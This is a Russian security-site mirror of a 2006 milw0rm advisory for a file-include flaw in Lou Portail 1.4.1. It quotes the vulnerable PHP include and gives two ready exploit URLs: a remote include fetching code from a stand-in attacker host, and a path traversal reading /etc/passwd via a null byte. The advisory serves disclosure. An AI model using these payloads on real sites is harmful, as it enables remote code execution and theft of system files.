Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Power Phlogger 2.0.9 Remote|Local File Include Vulnerability

  phpPowerCards 2.10 (txt.inc.
php) Remote Code Execution Vulnerability

  Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability

  Active Bulletin Board v1.1 beta2 (doprofiledit.
asp) Remote User Pass Change

From:mp01010_(at)_yahoo.com <mp01010_(at)_yahoo.com>
Date:23 октября 2006 г.
Subject:Lou Portail 1.4.1 Remote|Local File Include Vulnerability

## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
#                                                               #
#           [ Lou Portail 1.4.1 ]                               #
#                                                                
# Class:     Remote|Local File Include Vulnerability            #
# Patch:     Unavailable                                        #
# Published  2006/10/18                                         #
# Remote:    Yes                                                
# Local:     No                             #
# Type:      High                                               #
# Site:      http://louportail.free.fr/                         #
# Author:    MP
# Contact:   [email protected]                     #
#                                 #
#################################################################

Vuln Code (admin/admin_module.php):

<?...
 include ("$g_admin_rep/admin_utils.$g_ext");
...?>

#Vuln 1.0 -> require register_globals = On
http://louportail.com/admin/admin_module.php?g_admin_rep=http://attacker.
com&g_ext=txt

#Vuln 2.0 -> require magic_quotes_gpc = Off
http://louportail.com/admin/admin_module.php?g_admin_rep=../../../../../../../../
../../../../../../../../../../../../etc/passwd%00


# milw0rm.com [2006-10-20]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород